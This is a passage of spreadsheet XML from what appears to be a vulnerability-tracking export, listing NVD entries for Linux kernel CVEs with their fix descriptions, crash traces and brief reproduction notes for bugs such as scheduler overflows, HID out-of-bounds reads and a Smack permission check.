      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q998" s="5" t="inlineStr"/>
      <c r="R998" s="5" t="inlineStr"/>
      <c r="S998" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/x86/intel/uncore: Fix uncore_box ref/unref ordering
In uncore_event_cpu_online(), uncore_box_ref() was called before
uncore_change_context().  uncore_box_ref() gates on box-&gt;cpu &gt;= 0,
but box-&gt;cpu is still -1 at that point because uncore_change_context()
has not run yet.  As a result, the box is never initialized on the
first CPU to come online in a die, leaving it permanently
uninitialized in the single-CPU-per-die case.
Thus, box-&gt;refcnt is one count below the true value, and in the CPU
offline path, the box will be torn down on the second-to-last CPU.
In uncore_event_cpu_offline(), uncore_box_unref() was called after
uncore_change_context(), so box-&gt;cpu is already -1 when the collector
CPU goes offline, which prevents it from tearing down the box.
Fix by swapping the call order in both paths so that
uncore_box_{ref,unref}() runs at the point where box-&gt;cpu reflects
the correct context.
Move allocate_boxes() out of uncore_box_ref() to enable this
reordering.</t>
        </is>
      </c>
      <c r="T998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93181</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93182</t>
        </is>
      </c>
      <c r="D999" s="5" t="inlineStr"/>
      <c r="E999" s="5" t="inlineStr"/>
      <c r="F999" s="5" t="inlineStr"/>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="inlineStr"/>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr"/>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q999" s="5" t="inlineStr"/>
      <c r="R999" s="5" t="inlineStr"/>
      <c r="S999" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/fair: Fix overflow in update_tg_cfs_runnable()
A divide-by-zero crash is observed when running hackbench:
   [14697.488452] CPU: 112 UID: 0 PID: 124791 Comm: hackbench Not tainted 7.1.0-rc2+
   [14697.492627] RIP: 0010:propagate_entity_load_avg+0x35f/0x3e0
   [14697.506799]  &lt;TASK&gt;
   [14697.507411]  __dequeue_task+0x2b4/0xc70
   [14697.508677]  dequeue_task_fair+0x36/0x370
   [14697.509047]  dequeue_task+0x101/0x2f0
   [14697.509426]  __schedule+0x1b1/0x1a00
   [14697.510868]  anon_pipe_read+0x3da/0x450
   [14697.511400]  vfs_read+0x361/0x390
   [14697.512053]  __x64_sys_read+0x19/0x30
The divide-by-zero happens here:
  if (scale_load_down(gcfs_rq-&gt;load.weight)) {
           load_sum = div_u64(gcfs_rq-&gt;avg.load_sum,
                              scale_load_down(gcfs_rq-&gt;load.weight));
  }
gcfs_rq-&gt;load.weight is an insane large value and is truncated
to the lower 32 bits by div_u64, which happen to be 0.
Using AI for investigation, the cause is a u32 overflow in
update_tg_cfs_runnable(), and flat pickup became a victim when using
tg_tasks():
   u32 new_sum, divider;
   ...
   new_sum = se-&gt;avg.runnable_avg * divider; &lt;-- boom
The following sequence shows how this triggers the crash:
   propagate_entity_load_avg()
     update_tg_cfs_runnable()     # u32 overflow corrupts runnable_sum
   __update_load_avg_cfs_rq()
     ___update_load_avg()         # computes insane runnable_avg
   update_tg_load_avg()           # propagates to tg-&gt;runnable_avg
   update_cfs_group()
     calc_concur_shares()
       tg_tasks()                 # long-to-int truncation, negative nr
     reweight_entity()            # corrupted se-&gt;load.weight
       update_load_add()          # corrupted cfs_rq-&gt;load.weight
   propagate_entity_load_avg()
     update_tg_cfs_load()
       div_u64()                  # divide-by-zero
Fix by widening new_sum from u32 to u64 (no need to force tg_tasks()
to return unsigned long after this fix)</t>
        </is>
      </c>
      <c r="T999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93182</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93183</t>
        </is>
      </c>
      <c r="D1000" s="5" t="inlineStr"/>
      <c r="E1000" s="5" t="inlineStr"/>
      <c r="F1000" s="5" t="inlineStr"/>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="inlineStr"/>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr"/>
      <c r="L1000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1000" s="5" t="inlineStr"/>
      <c r="R1000" s="5" t="inlineStr"/>
      <c r="S1000" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/lima: call drm_mm_init() with a valid allocation range
lima_vm_create() is currently run before va_start and va_end are set up,
meaning they are both 0. lima_vm_create() runs drm_mm_init() with them
as arguments for the allocator, and if DRM_DEBUG_MM is enabled the
DRM_MM_BUG_ON check in drm_mm_init then fires, as seen here on
exynos4412-odroid-u2:
[    1.736297] ------------[ cut here ]------------
[    1.740370] kernel BUG at drivers/gpu/drm/drm_mm.c:931!
[    1.745574] Internal error: Oops - BUG: 0 [#1] SMP ARM
[    1.750697] Modules linked in:
[    1.753734] CPU: 0 UID: 0 PID: 41 Comm: kworker/u16:1 Not tainted 7.0.10-postmarketos-exynos4 #11 PREEMPT
[    1.763372] Hardware name: Samsung Exynos (Flattened Device Tree)
[    1.769446] Workqueue: events_unbound deferred_probe_work_func
[    1.775261] PC is at drm_mm_init+0x9c/0xa4
[    1.779339] LR is at lima_vm_create+0x144/0x17c
[ ... ]
Fix the issue by moving the lima_vm_create() call after va_start and
va_end are set up.</t>
        </is>
      </c>
      <c r="T1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93183</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93184</t>
        </is>
      </c>
      <c r="D1001" s="5" t="inlineStr"/>
      <c r="E1001" s="5" t="inlineStr"/>
      <c r="F1001" s="5" t="inlineStr"/>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="inlineStr"/>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr"/>
      <c r="L1001" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1001" s="5" t="inlineStr"/>
      <c r="R1001" s="5" t="inlineStr"/>
      <c r="S1001" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: fsl_audmix: rework runtime PM handling in probe
After pm_runtime_enable() the AUDMIX block is powered off and stays
suspended until the first runtime resume. Register writes issued between
probe() and the first resume (e.g. from DAPM or ALSA control paths)
target unpowered hardware and cause a system hang.
Fix this by calling pm_runtime_resume_and_get() immediately after
pm_runtime_enable() to power the hardware up and enable its clocks.
Release the reference afterwards with pm_runtime_put() to allow the
runtime PM framework to suspend the device and switch the regmap to
cache-only mode when idle.
When CONFIG_PM is disabled or runtime PM is not enabled, pm_runtime_*
calls are stubs that do not power up the hardware. Handle this case
explicitly by calling fsl_audmix_runtime_resume() directly so the
hardware is always initialised and its clocks are enabled, ensuring
register accesses succeed regardless of PM configuration.</t>
        </is>
      </c>
      <c r="T1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93184</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93185</t>
        </is>
      </c>
      <c r="D1002" s="5" t="inlineStr"/>
      <c r="E1002" s="5" t="inlineStr"/>
      <c r="F1002" s="5" t="inlineStr"/>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="inlineStr"/>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr"/>
      <c r="L1002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1002" s="5" t="inlineStr"/>
      <c r="R1002" s="5" t="inlineStr"/>
      <c r="S1002" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: rt700-sdw: always drain jack work on remove
rt700_sdw_remove() drains jack_detect_work and jack_btn_check_work only
when rt700-&gt;hw_init is true. That state bit is cleared by
rt700_update_status() when the SoundWire slave becomes UNATTACHED, but a
jack work item can already have been queued by rt700_interrupt_callback()
or rt700_jack_init() while the device was initialized.
Do not use hw_init as the remove-time guard for draining these work
objects. The delayed works are initialized during rt700_init(), so remove
can cancel them unconditionally and pair the object lifetime with the
codec-private data lifetime instead of a mutable hardware state bit.
This issue was found by our static analysis tool and then confirmed by
manual review of the SoundWire status, interrupt and remove paths. The
remove path should drain work based on whether the work object exists, not
on a runtime hardware state bit that can change after the work was queued.
A QEMU PoC queued jack_detect_work, simulated SDW_SLAVE_UNATTACHED, and
then entered remove. DEBUG_OBJECTS reported an active timer/work object
associated with the rt700 jack work path after remove skipped the cancel.
This is sent as an RFC because the practical trigger depends on SoundWire
core remove ordering after an UNATTACHED status update. If remove cannot
run after hw_init has been cleared while jack work is still pending, this
is a defensive lifecycle cleanup rather than a reachable race on current
systems.</t>
        </is>
      </c>
      <c r="T1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93185</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93186</t>
        </is>
      </c>
      <c r="D1003" s="5" t="inlineStr"/>
      <c r="E1003" s="5" t="inlineStr"/>
      <c r="F1003" s="5" t="inlineStr"/>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="inlineStr"/>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr"/>
      <c r="L1003" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1003" s="5" t="inlineStr"/>
      <c r="R1003" s="5" t="inlineStr"/>
      <c r="S1003" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/mbox: Clamp mailbox output allocation to the payload size
CXL_MEM_SEND_COMMAND bounds the user's in.size to the mailbox payload
size but leaves out.size unbounded, then cxl_mbox_cmd_ctor() calls
kvzalloc(out.size). A large out.size drives a huge allocation, above
INT_MAX it WARNs and taints, and with panic_on_warn=1 it panics.
The transport __cxl_pci_mbox_send_cmd() already clamps the response copy
to min(out.size, payload_size, device len), so the output buffer is
never written beyond payload_size. Clamp the allocation to payload_size
too, matching the RAW path.</t>
        </is>
      </c>
      <c r="T1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93186</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93187</t>
        </is>
      </c>
      <c r="D1004" s="5" t="inlineStr"/>
      <c r="E1004" s="5" t="inlineStr"/>
      <c r="F1004" s="5" t="inlineStr"/>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="inlineStr"/>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1004" s="5" t="inlineStr"/>
      <c r="R1004" s="5" t="inlineStr"/>
      <c r="S1004" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: SOF: ipc4-topology: Return error for invalid number of formats
When the number of input or output formats is zero,
sof_ipc4_widget_setup_comp_src() and sof_ipc4_widget_setup_comp_asrc()
print an error and jump to the cleanup label. At that point 'ret' is
still 0, because the earlier sof_ipc4_get_audio_fmt() call succeeded, so
the function returns success and the caller never finds out that the
widget setup actually failed.
Set ret to -EINVAL before the goto so the error gets reported.</t>
        </is>
      </c>
      <c r="T1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93187</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93188</t>
        </is>
      </c>
      <c r="D1005" s="5" t="inlineStr"/>
      <c r="E1005" s="5" t="inlineStr"/>
      <c r="F1005" s="5" t="inlineStr"/>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="inlineStr"/>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1005" s="5" t="inlineStr"/>
      <c r="R1005" s="5" t="inlineStr"/>
      <c r="S1005" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: roccat: bound device-supplied profile index
kone_keep_values_up_to_date() and kone_profile_activated() use an
8-bit, device-supplied profile value as an index into the 5-element
kone-&gt;profiles[] array without a range check. A malicious USB device
claiming the Roccat Kone id can send a switch-profile event (or a
startup_profile read at probe) with an out-of-range value and make the
driver read out of bounds; the result is exposed via the actual_dpi
sysfs attribute.
Reject out-of-range indices in both paths.
This was found with static analysis and confirmed with the KUnit test
added in the following patch (KASAN: slab-out-of-bounds).</t>
        </is>
      </c>
      <c r="T1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93188</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93189</t>
        </is>
      </c>
      <c r="D1006" s="5" t="inlineStr"/>
      <c r="E1006" s="5" t="inlineStr"/>
      <c r="F1006" s="5" t="inlineStr"/>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="inlineStr"/>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr"/>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1006" s="5" t="inlineStr"/>
      <c r="R1006" s="5" t="inlineStr"/>
      <c r="S1006" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: core: quiesce input in hid_hw_stop() to prevent use-after-free
A driver's probe calls hid_device_io_start() to enable input delivery,
then fails at a later initialization step and unwinds via hid_hw_stop().
The unwind frees struct hidraw via hidraw_disconnect() while in-flight
HID reports may still be running on another CPU, dereferencing the
freed object through hidraw_report_event(). syzbot reports the
resulting use-after-free for the corsair-psu HID driver.
Edward Adam Davis posted a per-driver fix for corsair-psu that adds
an explicit hid_device_io_stop() before hid_hw_stop() in the probe
error path ("hwmon: prevent packets from going to driver for probe",
2026-04-28). Auditing the tree shows 15 drivers call
hid_device_io_start(); 7 also call hid_device_io_stop() and 8 do not:
  drivers calling hid_device_io_start() without a matching
  hid_device_io_stop() before hid_hw_stop():
    drivers/hwmon/corsair-psu.c       (fix posted by Edward)
    drivers/hwmon/corsair-cpro.c
    drivers/hwmon/nzxt-kraken3.c
    drivers/hwmon/nzxt-smart2.c
    drivers/hwmon/gigabyte_waterforce.c
    drivers/hid/hid-logitech-dj.c
    drivers/hid/hid-nintendo.c
    drivers/hid/hid-mcp2221.c
Roughly half of all callers of the API are exposed. Centralize the
quiesce in hid_hw_stop() so callers do not have to remember the
matching stop: if a driver has left hdev-&gt;io_started true on entry,
call hid_device_io_stop() before hid_disconnect().
For the 7 drivers that already call hid_device_io_stop() correctly,
hdev-&gt;io_started is false on entry, the guard short-circuits, and
behavior is unchanged.
No Fixes: tag because the affected drivers gained their
hid_device_io_start() calls independently over years; the bug is a
class-wide API misuse rather than a regression from one commit.</t>
        </is>
      </c>
      <c r="T1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93189</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93190</t>
        </is>
      </c>
      <c r="D1007" s="5" t="inlineStr"/>
      <c r="E1007" s="5" t="inlineStr"/>
      <c r="F1007" s="5" t="inlineStr"/>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="inlineStr"/>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr"/>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1007" s="5" t="inlineStr"/>
      <c r="R1007" s="5" t="inlineStr"/>
      <c r="S1007" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: cros_ec_typec: Reject out-of-bounds PD cap count
cros_typec_register_partner_pdos() copies the partner PDOs from the EC
TYPEC_STATUS response into the fixed caps_desc.pdo[PDO_MAX_OBJECTS] array.
	memcpy(caps_desc.pdo, resp-&gt;source_cap_pdos,
	       sizeof(u32) * resp-&gt;source_cap_count);
	...
	memcpy(caps_desc.pdo, resp-&gt;sink_cap_pdos,
	       sizeof(u32) * resp-&gt;sink_cap_count);
PDO_MAX_OBJECTS is 7. source_cap_count and sink_cap_count are u8 fields
from the EC. The only check is that they are not both zero. If either is
larger than 7, the memcpy writes past the end of the array on the stack.
A count of 255 overflows it by about 1 KB. The EC source arrays are only
seven entries wide. A larger count reads past them too.
The ChromeOS EC firmware caps these counts today, so a compliant setup
does not hit this. The kernel should still validate these values rather
than trust them.
Validate the counts in cros_typec_register_partner_pdos() next to the
memcpy. Skip the PDO registration if either count is above PDO_MAX_OBJECTS.
The rest of cros_typec_handle_status() still runs so events are handled
and cleared.</t>
        </is>
      </c>
      <c r="T1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93190</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93191</t>
        </is>
      </c>
      <c r="D1008" s="5" t="inlineStr"/>
      <c r="E1008" s="5" t="inlineStr"/>
      <c r="F1008" s="5" t="inlineStr"/>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="inlineStr"/>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1008" s="5" t="inlineStr"/>
      <c r="R1008" s="5" t="inlineStr"/>
      <c r="S1008" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smack: fix incorrect task context in smack_msg_queue_msgrcv
The smack_msg_queue_msgrcv() function incorrectly checks
the permissions of the 'current' task instead of the
'target' task.
In the msgsnd() syscall path, if a receiver is already waiting,
the pipelined_send() optimization is used to push the message
directly to the receiver task:
    ipc/msg.c`pipelined_send():
    ` smp_store_release(&amp;msr-&gt;r_msg, msg)
In this case, the 'sender' (current) task performs the check
on behalf of the 'receiver' task (msr-&gt;r_tsk, passed as the
'target' parameter):
  ipc/msg.c`pipelined_send():
  ` security_msg_queue_msgrcv(,, target := msr-&gt;r_tsk,,)
However, smack_msg_queue_msgrcv() ignores the 'target' and
checks 'current':
  smack_msg_queue_msgrcv(…)
  ` smk_curacc_msq(isp, MAY_READWRITE); // current task
'current' MAY satisfy smack_msg_queue_msgrcv r/w requirement,
but 'target' (the receiver task) might NOT;
as a result, an unauthorized receiver gets the message,
violating MAC policy.
Test:
1) create a sysv message queue with label “foo”
2) echo "bar foo r" &gt;/smack/load2
3) msgrcv(,,,0,MSG_NOERROR) in "bar"-labeled task.
    The task is waiting for the messages ...
4) msgsnd() from a "foo"-labeled task:
"bar"-labeled task gets the message.
This patch fixes the issue by checking permission on the
'target' task instead of 'current'.
(2008-02-04, Casey Schaufler)</t>
        </is>
      </c>
      <c r="T1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93191</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93192</t>
        </is>
      </c>
      <c r="D1009" s="5" t="inlineStr"/>
      <c r="E1009" s="5" t="inlineStr"/>
      <c r="F1009" s="5" t="inlineStr"/>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="inlineStr"/>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr"/>
      <c r="L1009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1009" s="5" t="inlineStr"/>
      <c r="R1009" s="5" t="inlineStr"/>
      <c r="S1009" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/v3d: Clear queue-&gt;active_job when v3d_fence_create() fails
The run_job() callbacks for BIN, RENDER, TFU and CSD assign the incoming
job to queue-&gt;active_job before calling v3d_fence_create(). If
v3d_fence_create() fails, the callback returns NULL without clearing
active_job, leaving a dangling pointer.
Create a failure path in all run_job() callbacks that clears the active
job before returning NULL. The BIN path takes queue-&gt;queue_lock around the
clear as it races against v3d_overflow_mem_work(); RENDER, TFU and CSD
paths have no concurrent reader, so the clear is lock-free.</t>
        </is>
      </c>
      <c r="T1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93192</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93193</t>
        </is>
      </c>
      <c r="D1010" s="5" t="inlineStr"/>
      <c r="E1010" s="5" t="inlineStr"/>
      <c r="F1010" s="5" t="inlineStr"/>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="inlineStr"/>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr"/>
      <c r="L1010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1010" s="5" t="inlineStr"/>
      <c r="R1010" s="5" t="inlineStr"/>
      <c r="S1010" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: analogix_dp: Fix OF node reference leak via auto cleanup
Sashiko reported a reference leak in rockchip_dp_drm_encoder_enable(),
the of_get_child_by_name() function does not call of_node_put() in a
symmetrical way [1].
Fix the device node reference leak by using __free(device_node) to
automatically manage of_node_put() for all device nodes.</t>
        </is>
      </c>
      <c r="T1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93193</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
